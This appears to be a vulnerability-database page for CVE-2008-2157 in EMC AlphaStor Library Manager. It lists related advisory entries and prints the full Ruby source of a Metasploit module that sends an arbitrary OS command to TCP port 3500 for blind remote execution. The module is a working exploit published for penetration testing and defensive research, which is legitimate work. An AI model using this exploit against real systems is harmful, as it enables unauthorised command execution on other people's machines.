Lucene search
K

EMC AlphaStor Library Manager Arbitrary Command Execution

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 162 Views

EMC AlphaStor Library Manager Arbitrary Command Execution vulnerability with remote command injectio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2008-2157
29 May 200816:32
attackerkb
Tenable Nessus
EMC AlphaStor Device Manager robotd RCE
1 Jul 200800:00
nessus
Tenable Nessus
EMC AlphaStor Library Manager Remote Code Execution
1 Jul 200800:00
nessus
Circl
CVE-2008-2157
29 May 201815:50
circl
CVE
CVE-2008-2157
29 May 200816:00
cve
Cvelist
CVE-2008-2157
29 May 200816:00
cvelist
d2
DSquare Exploit Pack: D2SEC_ALPHASTOR_LM
29 May 200816:32
d2
Metasploit
EMC AlphaStor Device Manager Arbitrary Command Execution
1 Sep 200811:28
metasploit
Metasploit
EMC AlphaStor Library Manager Arbitrary Command Execution
11 Oct 200800:56
metasploit
NVD
CVE-2008-2157
29 May 200816:32
nvd
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'EMC AlphaStor Library Manager Arbitrary Command Execution',  
'Description' => %q{  
EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability  
because the application fails to properly sanitize user-supplied input.  
},  
'Author' => [ 'MC' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],  
[ 'CVE', '2008-2157' ],  
[ 'OSVDB', '45715' ],  
[ 'BID', '29398' ],  
],  
'DisclosureDate' => '2008-05-27'))  
  
register_options(  
[  
Opt::RPORT(3500),  
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),  
])  
end  
  
def run  
connect  
  
data = "\x75" + datastore['CMD']  
pad = "\x00" * 512  
  
pkt = data + pad  
  
# commands are executed blindly.  
print_status("Sending command: #{datastore['CMD']}")  
sock.put(pkt)  
  
select(nil,nil,nil,1)  
  
sock.get_once  
  
print_status("Executed '#{datastore['CMD']}'...")  
  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.84999
162